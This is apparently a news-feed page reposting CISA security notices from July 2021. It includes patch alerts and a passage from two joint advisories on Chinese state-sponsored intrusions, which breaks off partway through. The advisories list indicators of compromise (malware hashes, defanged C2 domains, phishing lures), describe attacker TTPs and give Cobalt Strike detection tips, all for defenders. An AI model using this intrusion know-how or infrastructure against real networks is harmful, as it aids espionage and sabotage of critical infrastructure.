Sicurezza – News ENG

News, Alert e Bollettini da Computer Emergency Response Team in lingua inglese

CERT (US-CERT)
  • CISA Releases Security Advisory for Geutebruck Devices
    by CISA on 27 Luglio 2021 at 4:05 pm

    Original release date: July 27, 2021CISA has released an Industrial Control Systems (ICS) advisory detailing multiple vulnerabilities in multiple Geutebruck G-CAM E2 series devices and Encoder G-Code versions. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. CISA encourages users and administrators to review the ICS Advisory ICSA-21-208-03 Geutebruck G-Cam E2 and G-Code and apply the necessary updates and workarounds This product is provided subject to this Notification and this Privacy & Use policy.

  • Apple Releases Security Updates
    by CISA on 27 Luglio 2021 at 11:05 am

    Original release date: July 27, 2021Apple has released security updates to address a vulnerability in multiple products. An attacker could exploit this vulnerability to take control of an affected device. CISA encourages users and administrators to review the security update page for the following products and apply the necessary updates: MacOS Big Sur 11.5.1 iOS 14.7.1 and iPadOS 14.7.1 This product is provided subject to this Notification and this Privacy & Use policy.

  • Microsoft Releases Guidance for Mitigating PetitPotam NTLM Relay Attacks
    by CISA on 27 Luglio 2021 at 11:03 am

    Original release date: July 27, 2021On July 23, Microsoft released KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) to address a NTLM Relay Attack named PetitPotam. CISA encourages users and administrators to review KB5005413 and apply the necessary mitigations. This product is provided subject to this Notification and this Privacy & Use policy.

  •  Cisco Releases Security Updates
    by CISA on 22 Luglio 2021 at 2:01 pm

    Original release date: July 22, 2021Cisco has released security updates to address multiple vulnerabilities in Intersight Virtual Appliance. An attacker could exploit these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page. CISA encourages users and administrators to review Cisco Advisory cisco-sa-ucsi2-iptaclbp-L8Dzs8m8 and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy.

  • Drupal Releases Security Updates
    by CISA on 22 Luglio 2021 at 2:00 pm

    Original release date: July 22, 2021Drupal has released security updates to address a critical third-party-library vulnerability that could affect Drupal 7,  8.9, 9.1, and 9.2. An attacker could exploit this vulnerability to take control of an affected system. CISA encourages users and administrators to review the Drupal security advisory and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy.

  • 2021 CWE Top 25 Most Dangerous Software Weaknesses
    by CISA on 21 Luglio 2021 at 5:07 pm

    Original release date: July 21, 2021The Homeland Security Systems Engineering and Development Institute, sponsored by the Department of Homeland Security and operated by MITRE, has released the 2021 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Weaknesses list. The Top 25 uses data from the National Vulnerability Database (NVD) to compile the most frequent and critical errors that can lead to serious vulnerabilities in software. An attacker can often exploit these vulnerabilities to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition. CISA encourages users and administrators to review the Top 25 list and evaluate recommended mitigations to determine those most suitable to adopt. This product is provided subject to this Notification and this Privacy & Use policy.

  • Malware Targeting Pulse Secure Devices
    by CISA on 21 Luglio 2021 at 3:00 pm

    Original release date: July 21, 2021As part of CISA’s ongoing response to Pulse Secure compromises, CISA has analyzed 13 malware samples related to exploited Pulse Secure devices. CISA encourages users and administrators to review the following 13 malware analysis reports (MARs) for threat actor techniques, tactics, and procedures (TTPs) and indicators of compromise (IOCs) and to review CISA’s Alert Exploitation of Pulse Connect Secure Vulnerabilities for more information.  MARS: MAR-10333209-1.v1: Pulse Connect Secure MAR-10333243-1.v1: Pulse Connect Secure MAR-10334057-1.v1: Pulse Connect Secure MAR-10334057-2.v1: Pulse Connect Secure MAR-10334587-1.v1: Pulse Connect Secure MAR-10334587-2.v1: Pulse Connect Secure MAR-10335467-1.v1: Pulse Connect Secure MAR-10336161-1.v1: Pulse Connect Secure MAR-10336935-1.v1: Pulse Connect Secure MAR-10337580-1.v1: Pulse Connect Secure MAR-10337580-2.v1: Pulse Connect Secure MAR-10338401-1.v1: Pulse Connect Secure MAR-10338868-1.v1: Pulse Connect Secure This product is provided subject to this Notification and this Privacy & Use policy.

  • Adobe Releases Security Updates for Multiple Products 
    by CISA on 21 Luglio 2021 at 10:39 am

    Original release date: July 21, 2021Adobe has released security updates to address vulnerabilities in multiple Adobe products. An attacker could exploit some of these vulnerabilities to take control of an affected system. CISA encourages users and administrators to review the following Adobe Security Bulletins and apply the necessary updates: APSB21-63 Photoshop APSB21-62 Audition APSB21-59 Character Animator APSB21-58 Prelude APSB21-56 Premiere Pro APSB21-54 After Effects APSB21-43 Media Encoder This product is provided subject to this Notification and this Privacy & Use policy.

  • Apple Releases Security Updates
    by CISA on 21 Luglio 2021 at 10:37 am

    Original release date: July 21, 2021Apple has released security updates to address vulnerabilities in multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected device. CISA encourages users and administrators to review the Apple security pages for the following products and apply the necessary updates. MacOS Big Sur 11.5 Security Update 2021-004 Catalina Security Update 2021-005 Mojave iPadOS 14.7 This product is provided subject to this Notification and this Privacy & Use policy.

  • Google Releases Security Updates for Chrome
    by CISA on 21 Luglio 2021 at 10:35 am

    Original release date: July 21, 2021Google has released Chrome version 92.0.4515.107 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. CISA encourages users and administrators to review the Chrome Release Note and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-201A: Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013
    by CISA on 20 Luglio 2021 at 1:00 pm

    Original release date: July 20, 2021 | Last revised: July 21, 2021SummaryThis Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques. Note: CISA released technical information, including indicators of compromise (IOCs), provided in this advisory in 2012 to affected organizations and stakeholders. This Joint Cybersecurity Advisory—coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI)—provides information on a spearphishing and intrusion campaign conducted by state-sponsored Chinese actors that occurred from December 2011 to 2013, targeting U.S. oil and natural gas (ONG) pipeline companies. CISA and the FBI provided incident response and remediation support to a number of victims of this activity. Overall, the U.S. Government identified and tracked 23 U.S. natural gas pipeline operators targeted from 2011 to 2013 in this spearphishing and intrusion campaign. Of the known targeted entities, 13 were confirmed compromises, 3 were near misses, and 7 had an unknown depth of intrusion. The U.S. Government has attributed this activity to Chinese state-sponsored actors. CISA and the FBI assess that these actors were specifically targeting U.S. pipeline infrastructure for the purpose of holding U.S. pipeline infrastructure at risk. Additionally, CISA and the FBI assess that this activity was ultimately intended to help China develop cyberattack capabilities against U.S. pipelines to physically damage pipelines or disrupt pipeline operations. This advisory provides information on this campaign, including tactics, techniques, and procedures (TTPs) and IOCs. The TTPs remain relevant to help network defenders protect against intrusions. The IOCs are provided for historical awareness. CISA and the FBI urge owners and operators of Energy Sector and other critical infrastructure (CI) networks to adopt a heightened state of awareness and implement the recommendations listed in the Mitigations section of this advisory, which include implementing network segmentation between IT and industrial control system (ICS)/operational technology (OT) networks. These mitigations will improve a CI entity’s defensive cyber posture and functional resilience by reducing the risk of compromise or severe operational degradation if the system is compromised by malicious cyber actors, including but not limited to actors associated with the campaign described in this advisory. For more information on Chinese malicious cyber activity, see us-cert.cisa.gov/china. Click here for a PDF version of this report. Technical DetailsIn April 2012, CISA received reports about targeted attacks directed at multiple ONG pipeline sites; CISA (via a predecessor organization) and FBI provided incident response and remediation support to a number of victims from 2012 to 2013. CISA and FBI’s analysis of the malware and threat actor techniques identified that this activity was related to a spearphishing campaign. The U.S. Government identified and tracked 23 U.S. natural gas pipeline operators targeted in this campaign. Of the 23 known targeted entities, 13 were confirmed compromises, 3 were near misses, and 7 had an unknown depth of intrusion. Threat Actor Activity The spearphishing activity appears to have started in late December 2011. From December 9, 2011, through at least February 29, 2012, ONG organizations received spearphishing emails [T1566.002] specifically targeting their employees. The emails were at constructed with a high level of sophistication to convince employees to view malicious files [T1204.002]. Note: see the appendix for a table of the MITRE ATT&CK tactics and techniques observed in this campaign. In addition to spearphishing, CISA and the FBI were made aware of social engineering attempts by malicious actors believed to be associated with this campaign. The apparent goal was to gain sensitive information from asset owners [T1598]. One asset owner reported that individuals in their network engineering department, including managers, received multiple phone calls requesting information about their recent network security practices. Other employees in other departments were not targeted. The asset owner also reported that these calls began immediately after they had identified and removed the malicious intruder from their network and performed a system-wide credential reset. The caller identified himself as an employee of a large computer security firm performing a national survey about network cybersecurity practices. He inquired about the organization’s policy and practices for firewall use and settings, types of software used to protect their network, and the use and type of intrusion detection and/or prevention systems. The caller was blocking his caller ID and when the targeted organization tried to return the call, they reached a number that was not in service. During the investigation of these compromises, CISA and FBI personnel discovered that Chinese state-sponsored actors specifically collected [TA0009] and exfiltrated [TA0010] ICS-related information. The Chinese state-sponsored actors searched document repositories [T1213] for the following data types: Document searches: “SCAD*” Personnel lists Usernames/passwords Dial-up access information System manuals Based on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks. Though designed for legitimate business purposes, these systems have the potential to be manipulated by malicious cyber actors if unmitigated. With this access, the Chinese state-sponsored actors could have impersonated legitimate system operators to conduct unauthorized operations. According to the evidence obtained by CISA and FBI, the Chinese state-sponsored actors made no attempts to modify the pipeline operations of systems they accessed. Note: there was a significant number of cases where log data was not available, and the depth of intrusion and persistent impacts were unable to be determined; at least 8 of 23 cases (35 percent) identified in the campaign were assessed as having an unknown depth of intrusion due to the lack of log data. CISA and FBI assess that during these intrusions, China was successful in accessing the supervisory control and data acquisition (SCADA) networks at several U.S. natural gas pipeline companies. Chinese actors also gained information specific to dial-up access, including phone numbers, usernames, and passwords [T1120]. Dial-up modems continue to be prevalent in the Energy Sector, providing direct access into the ICS environment with little or no security and no monitoring, which makes them an optimal vector for hold-at-risk operations. The exfiltrated data provided the capabilities for the Chinese cyber actors to access ONG operational systems at a level where they could potentially conduct unauthorized operations. Exfiltrated Information and Assessed Motives The Chinese actors specifically targeted information that pertained to access of ICSs. Searches were made for terms involving “SCAD*,” and the actors exfiltrated documents, including personnel lists, usernames and passwords, dial-up access information, remote terminal unit (RTU) sites, and systems manuals. The Chinese actors also exfiltrated information pertaining to ICS permission groups and compromised jump points between corporate and ICS networks. The totality of this information would allow the actors to access ICS networks via multiple channels and would provide sufficient access to allow them to remotely perform unauthorized operations on the pipeline with physical consequences. CISA and FBI assess that these intrusions were likely intended to gain strategic access to the ICS networks for future operations rather than for intellectual property theft. This assessment was based on the content of the data that was being exfiltrated and the TTPs used to gain that access. One victim organization set up a honeypot that contained decoy documents with content that appeared to be SCADA-related data and sensitive organizational information. According to this organization, the SCADA-related decoy content was exfiltrated within 15 minutes of the time it was made available in the honeypot. Other sensitive decoy information, including financial and business-related information, was ignored. CISA and FBI assess that this activity was ultimately intended to help China develop cyberattack capabilities against U.S. pipelines to physically damage pipelines or disrupt pipeline operations. Indicators of Compromise Table 1 lists indicators related to this spearphishing and intrusion campaign as of May 7, 2012, which are provided in this alert for historical completeness. Table 1: IOCs from Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Type Indicator Filename Malware MD5:84873fae9cdecb84452fff9cca171004  ntshrui.dll   Malicious email content, including any attachments and/or message body fpso.bigish[.]net   Malware MD5:e12ce62cf7de42581c2fe1d7f36d521c  ntshrui.dll   User agent string Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)   User agent string Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)   Named pipe ssnp   Possible command and control (C2) domain <xxx>.arrowservice[.]net Where xxx is the targeted company name abbreviation   Malware MD5:7361a1f33d48802d061605f34bf08fb0   spoolsvd.exe Malware 5e6a033fa01739d9b517a468bd812162 AdobeUpdater.exe Malware e62afe2273986240746203f9d55496db ins.exe Malware ed92d1242c0017668b93a72865b0876b px.exe Malware 6818a9aef22c0c2084293c82935e84fe gh.exe Malware fcbbfadc992e265c351e54598a6f6dfb fslist.exe Malware 05476307f4beb3c0d9099270c504f055 u.exe Malware 54db65a27472c9f3126df5bf91a773ea slm.exe Malware a46a7045c0a3350c5a4c919fff2831a0 niu.exe Malware 60456fe206a87f5422b214369af4260e ccApp1.exe Malware d6eaadcbcf9ea9192db1bd5bb7462bf8 ntshrui.dll Malware 52294de74a80beb1e579e5bca7c7248a moonclient2.exe Malware e62afe2273986240746203f9d55496db inn.exe Malware 5e6a033fa01739d9b517a468bd812162 kkk.exe Malware 4a8854363044e4d66bf34a0cd331d93d inn.exe Malware 124ad1778c65a83208dbefcec7706dc6 AcroRD32.exe Malware 17199ddac616938f383a0339f416c890 iass.dll Malicious email sender address “(name of victim company official)@yahoo.com”   Malicious email content, including any attachments and/or message body “If not read this paper, pay attention.”   Malicious email hyperlinked probable malware The hyperlink indicated a “.zip” file and contained the words “quality specifications” in reference to a particular component or product unique to the victim U.S. corporation.   Malicious email signature block Contained the name, title, phone number, and corporate email address of an actual victim company official.   Malicious attachment name   Project-seems-clear-for-takeoff.zip Possible C2 domain <xxx>.arrowservice[dot]net Where <xxx> may be the full name of the targeted company   Possible C2 domain <xxx>.federalres[.]org   Possible C2 domain <xxx>.businessconsults[.]net Where <xxx> may be the targeted company name abbreviation or full name   Possible C2 domain idahoanad[dot]org   Possible C2 domain energyreview.strangled[.]net   Possible C2 domain blackcake[.]net    Possible C2 domain infosupports[.]com   Malware 7caf4dbf53ff1dcd5bd5be92462b2995 iTunesHelper.exe  Malware 99b58e416c5e8e0bcdcd39ba417a08ed Solarworldsummary.exe Malware f0a00cfd891059b70af96b807e9f9ab8 smss.exe Malware ea1b46fab56e7f12c4c2e36cce63d593 AcroRD32.exe Malicious email content, including any attachments and/or message body  3d28651bb2d16eeaa6a35099c886fbaa Election_2012_Analysis.pdf Possible C2 domain balancefitstudio[.]com   Possible C2 domain res.federalres[.]org   Possible C2 domain 18center[.]com   Possible C2 domain milk.crabdance[.]com   Possible C2 domain bargainblog[.com[.]au   Possible C2 domain etrace-it[.]com   Possible C2 domain picture.wintersline[.]com   Possible C2 domain wish.happyforever[.]com   Possible C2 domain mitchellsrus[.]com   Possible C2 domain un.linuxd[.]org   Malicious email content, including any attachments and/or message body    How_Can_Steelmakers_Compete_for_Growth_in_the_Steel_Sector_in_2012.zip Malicious email content, including any attachments and/or message body    (Company Name)_Summary.zip Malicious email content, including any attachments and/or message body  f5369e59a1ddca9b97ede327e98d8ffe Solarworldsummary.zip Malicious email content, including any attachments and/or message body    (Company Name)_to_Sell_RNGMS_to_(Company Name).zip Malicious email content, including any attachments and/or message body    Gift-Winter.zip Malicious email content, including any attachments and/or message body    Happy_New_Year.zip Malicious email content, including any attachments and/or message body    Debt_Crisis_Hits_US.zip Malicious email content, including any attachments and/or message body    01-12-RATEALERT.zip Malicious email content, including any attachments and/or message body  fni.itgamezone[.]net     MitigationsCISA and the FBI urge Energy Sector and other CI owners and operators to apply the following mitigations to implement a layered, defense-in-depth cyber posture. By implementing a layered approach, administrators will enhance the defensive cyber posture of their OT/ICS networks, reducing the risk of compromise or severe operational degradation if their system is compromised by malicious cyber actors. Harden the IT/corporate network to reduce the risk of initial compromise. Update all software, including operating systems, applications, and firmware, in a timely manner. Consider using a centralized patch management system. Replace all end-of-life software and hardware devices. Restrict and manage remote access software. Remote access tools are a common method for threat actors to gain initial access and persistence on target networks. Manage and restrict users and groups who are permitted to access remote capabilities. Permissions should be limited to users that require the capability to complete their duties. Require multi-factor authentication (MFA) for remote access. Limit access to resources over networks, especially by restricting Remote Desktop Protocol (RDP). If RDP is operationally necessary, restrict the originating sources and require MFA. Enable strong spam filters to prevent phishing emails from reaching end users. Implement unauthorized execution prevention by: Disabling macro scrips from Microsoft Office files transmitted via email. Implementing application allowlisting, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common malware locations, such as temporary folders supporting popular internet browsers. Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allow lists. Set antivirus/antimalware programs to regularly scan IT network assets using up-to-date signatures. Implement and ensure robust network segmentation between IT and ICS networks to limit the ability of cyber threat actors to move laterally to ICS networks if the IT network is compromised. Implement a network topology for ICS that has multiple layers, with the most critical communications occurring in the most secure and reliable layer. For more information refer to National Institute of Standard and Technology (NIST) Special Publication 800-82: Guide to ICS Security. Use one-way communication diodes to prevent external access, whenever possible. Set up demilitarized zones (DMZs) to create a physical and logical subnetwork that acts as an intermediary for connected security devices to avoid exposure. Employ reliable network security protocols and services where feasible. Consider using virtual local area networks (VLANs) for additional network segmentation, for example, by placing all printers in separate, dedicated VLANs and restricting users’ direct printer access. Implement perimeter security between network segments to limit the ability of cyber threat actors to move laterally. Control traffic between network segments by using firewalls, intrusion detection systems (IDSs), and filter routers and switches. Implement network monitoring at key chokepoints—including egress points to the internet, between network segments, core switch locations—and at key assets or services (e.g., remote access services). Configure an IDS to create alarms for any ICS traffic outside normal operations (after establishing a baseline of normal operations and network traffic). Configure security incident and event monitoring (SIEM) to monitor, analyze, and correlate event logs from across the ICS network to identify intrusion attempts. Implement the following additional ICS environment best practices: Update all software. Use a risk-based assessment strategy to determine which ICS network and assets and zones should participate in the patch management program. Test all patches in off-line text environments before implementation. Implement application allowlisting on human machine interfaces. Harden field devices, including tablets and smartphones. Replace all end-of-life software and hardware devices. Disable unused ports and services on ICS devices (after testing to ensure this will not affect ICS operation). Restrict and manage remote access software. Require MFA for remote access to ICS networks. Configure encryption and security for ICS protocols. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware. Do not allow vendors to connect their devices to the ICS network. Use of a compromised device could introduce malware.  Maintain an ICS asset inventory of all hardware, software, and supporting infrastructure technologies.  Ensure robust physical security is in place to prevent unauthorized personal from accessing controlled spaces that house ICS equipment. Regularly test manual controls so that critical functions can be kept running if ICS/OT networks need to be taken offline. Manage the supply chain by adjusting the ICS procurement process to weigh cybersecurity heavily as part of the scoring and evaluation methodology. Additionally, establish contractual agreements for all outsourced services that ensure proper incident handling and reporting, security of interconnections, and remote access specifications and processes. Implement the following additional best practices: Implement IP geo-blocking, as appropriate. Implement regular, frequent data backup procedures on both the IT and ICS networks. Data backup procedures should address the following best practices: Ensure backups are regularly tested. Store backups separately, i.e., backups should be isolated from network connections that could enable spread of malware or lateral movement. Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt. Retain backup hardware to rebuild systems in the even rebuilding the primary system is not preferred. Implement a user training program to train employees to recognize spearphishing attempts, discourage users from visiting malicious websites or opening malicious attachments, and re-enforce appropriate user response to spearphishing emails. APPENDIX: Tactics and Techniques Table 2 provides a summary of the MITRE ATT&CK tactics and techniques observed in this campaign. Table 2: Observed MITRE ATT&CK tactics and techniques Tactic Technique Reconnaissance [TA0043] Phishing for Information [T1598] Initial Access [TA0001] Phishing: Spearphishing Link [T1566.002] Execution [TA0002] User Execution: Malicious File [T1204.002] Discovery [TA0007] Peripheral Device Discovery [T1120] Collection [TA0009] Information from Document Repositories [T1213] Exfiltration  [TA0010]   Revisions Initial Version: July 20, 2021 July 20, 2021: Corrected "unknown depth of intrusion" in Technical Details from 8 to 7. July 20, 2021: Removed "Office Viewer" recommendation since it's deprecated. This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-200B: Chinese State-Sponsored Cyber Operations: Observed TTPs
    by CISA on 19 Luglio 2021 at 11:00 am

    Original release date: July 19, 2021SummaryThis advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9, and MITRE D3FEND™ framework, version 0.9.2-BETA-3. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques and the D3FEND framework for referenced defensive tactics and techniques. The National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People’s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China’s long-term economic and military development objectives. This Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis. To increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. Note: NSA, CISA, and FBI encourage organization leaders to review CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders for information on this threat to their organization. Click here for a PDF version of this report. Technical DetailsTrends in Chinese State-Sponsored Cyber Operations NSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis: Acquisition of Infrastructure and Capabilities. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community’s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools. Exploitation of Public Vulnerabilities. Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability’s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see: CISA-FBI Joint CSA AA20-133A: Top 10 Routinely Exploited Vulnerabilities, CISA Activity Alert: AA20-275A: Potential for China Cyber Response to Heightened U.S.-China Tensions, and NSA CSA U/OO/179811-20: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities. Encrypted Multi-Hop Proxies. Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection. Observed Tactics and Techniques Chinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable JSON file is also available on the NSA Cybersecurity GitHub page. Refer to Appendix A: Chinese State-Sponsored Cyber Actors’ Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations. Figure 1: Example of tactics and techniques used in various cyber operations.   Mitigations NSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques: Patch systems and equipment promptly and diligently. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle.Note: for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section. Enhance monitoring of network traffic, email, and endpoint systems. Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files. Use protection capabilities to stop malicious activity. Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.▪ Resources Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ for previous reporting on Chinese state-sponsored malicious cyber activity. Disclaimer of Endorsement The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. Purpose This document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see http://www.us-cert.gov/tlp/. Trademark Recognition MITRE and ATT&CK are registered trademarks of The MITRE Corporation. • D3FEND is a trademark of The MITRE Corporation. • Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. • Pulse Secure is a registered trademark of Pulse Secure, LLC. • Apache is a registered trademark of Apache Software Foundation. • F5 and BIG-IP are registered trademarks of F5 Networks. • Cobalt Strike is a registered trademark of Strategic Cyber LLC. • GitHub is a registered trademark of GitHub, Inc. • JavaScript is a registered trademark of Oracle Corporation. • Python is a registered trademark of Python Software Foundation. • Unix is a registered trademark of The Open Group. • Linux is a registered trademark of Linus Torvalds. • Dropbox is a registered trademark of Dropbox, Inc. APPENDIX A: Chinese State-Sponsored Cyber Actors’ Observed Procedures Note: D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques. Tactics: Reconnaissance [TA0043]     Table 1: Chinese state-sponsored cyber actors’ Reconnaissance TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques Active Scanning [T1595]  Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft® 365 (M365), formerly Office® 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python® scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization’s fully qualified domain name, IP address space, and open ports to target or exploit. Minimize the amount and sensitivity of data available to external parties, for example:  Scrub user email addresses and contact lists from public websites, which can be used for social engineering,  Share only necessary data and information with third parties, and  Monitor and limit third-party access to the network.  Active scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence. Detect:  Network Traffic Analysis Connection Attempt Analysis [D3-CAA] Isolate:  Network Isolation Inbound Traffic Filtering [D3-ITF] Gather Victim Network Information [T1590]   Tactics: Resource Development [TA0042] Table II: Chinese state-sponsored cyber actors’ Resource Development TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques Acquire Infrastructure [T1583]   Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.   Adversary activities occurring outside the organization’s boundary of control and view makes mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.   N/A Stage Capabilities [T1608] Obtain Capabilities [T1588]:  Tools [T1588.002] Chinese state-sponsored cyber actors have been observed using Cobalt Strike® and tools from GitHub® on victim networks.  Organizations may be able to identify malicious use of Cobalt Strike by: Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed.  Looking for the default Cobalt Strike TLS certificate.  Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic. Review the traffic destination domain, which may be malicious and an indicator of compromise. Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile. Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.   N/A Tactics: Initial Access [TA0001] Table III: Chinese state-sponsored cyber actors’ Initial Access TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques Threat Actor Procedure(s) Detection and Mitigation Recommendations Detection and Mitigation Recommendations Drive By Compromise [T1189] Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains. Ensure all browsers and plugins are kept up to date. Use modern browsers with security features turned on. Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript®, restrict browser extensions, etc. Use adblockers to help prevent malicious code served through advertisements from executing.  Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes.  Use browser sandboxes or remote virtual environments to mitigate browser exploitation. Use security applications that look for behavior used during exploitation, such as Windows Defender® Exploit Guard (WDEG). Detect:  Identifier Analysis Homoglyph Detection [D3-HD] URL Analysis [D3-UA] File Analysis Dynamic Analysis [D3-DA] Isolate:  Execution Isolation Hardware-based Process Isolation [D3-HBPI] Executable Allowlisting [D3-EAL] Network Isolation DNS Denylisting [D3-DNSDL]  Outbound Traffic Filtering [D3-OTF] Exploit Public-Facing Application [T1190] Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[1] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber 